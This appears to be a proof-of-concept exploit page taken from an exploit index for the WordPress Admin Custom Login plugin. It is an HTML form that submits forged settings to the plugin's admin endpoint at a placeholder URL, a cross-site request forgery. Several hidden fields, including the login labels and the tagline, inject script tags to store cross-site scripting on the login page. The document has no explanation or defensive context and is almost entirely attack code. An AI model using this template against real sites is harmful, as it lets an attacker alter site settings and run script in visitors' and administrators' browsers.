Share
## https://sploitus.com/exploit?id=WPEX-ID:7720B38F-8862-4897-8E05-8E5964F0415F
<html>
<body>
<form action="http://[URL_HERE]/wp-admin/admin.php?page=admin_custom_login" method="POST">
<input type="hidden" name="Action" value="loginbgSave" />
<input type="hidden" name="login_form_position" value="default" />
<input type="hidden" name="Login_bg_value" value="static-background-image" />
<input type="hidden" name="login_background_color" value="#1e73be" />
<input type="hidden" name="login_bg_color_overlay" value="pattern-1" />
<input type="hidden" name="login_bg_image" value="http://wordsesh.vhx.cloud:8080/wp-content/plugins/admin-custom-login//images/3d-background.jpg" />
<input type="hidden" name="login_form_opacity" value="10" />
<input type="hidden" name="login_form_width" value="358" />
<input type="hidden" name="login_form_radius" value="10" />
<input type="hidden" name="login_border_style" value="solid" />
<input type="hidden" name="login_redirect_force" value="no" />
<input type="hidden" name="login_border_thikness" value="4" />
<input type="hidden" name="login_border_color" value="#0069A0" />
<input type="hidden" name="login_bg_repeat" value="repeat" />
<input type="hidden" name="login_bg_position" value="undefined" />
<input type="hidden" name="login_enable_shadow" value="yes" />
<input type="hidden" name="login_shadow_color" value="#C8C8C8" />
<input type="hidden" name="login_custom_css" value="" />
<input type="hidden" name="login_redirect_user" value="" />
<input type="hidden" name="login_force_redirect_url" value="http://wordsesh.vhx.cloud:8080/wp-login.php" />
<input type="hidden" name="login_form_left" value="700" />
<input type="hidden" name="log_form_above_msg" value=""><script>alert(0)</script>" />
<input type="hidden" name="login_msg_font_color" value="#000000" />
<input type="hidden" name="login_tagline_text_color" value="#fff" />
<input type="hidden" name="login_tagline_link_color" value="#f00" />
<input type="hidden" name="login_msg_fontsize" value="16" />
<input type="hidden" name="login_form_top" value="300" />
<input type="hidden" name="login_form_float" value="center" />
<input type="hidden" name="tagline_msg" value="Login form is designed using <a href="https://wordpress.org/plugins/admin-custom-login/" target="_blank">ACL</a> plugin by <a href="https://www.weblizar.com" target="_blank">Weblizar</a><script>alert(11)</script>" />
<input type="hidden" name="user_cust_lbl" value=""><script>alert(0)</script>" />
<input type="hidden" name="pass_cust_lbl" value=""><script>alert(0)</script>" />
<input type="hidden" name="label_username" value=""><script>alert(0)</script>" />
<input type="hidden" name="label_password" value=""><script>alert(0)</script>" />
<input type="hidden" name="label_loginButton" value=""><script>alert(0)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>